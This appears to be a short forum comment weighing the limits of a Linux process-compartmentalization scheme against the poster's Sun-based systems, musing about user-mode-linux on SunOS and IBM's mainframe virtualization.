    Of course, 1) it isn't a real compartment with your own filesystem and everything, so for example installing Perl modules, tweaking boot scripts, or tweaking security ain't happening. 2) it isn't strong compartmentalization. And 3) you have to be running a linux kernel in the first place. And 4) the above problems tend to involve Suns, not linux boxes.

    Seems this kind of idea is killer though. It would be really interesting if we could run something like this or (maybe better yet) user-mode-linux efficiently as a process inside a SunOS environment. Sounds like IBM had the right idea running a bunch of complete OS images on their heavy iron.
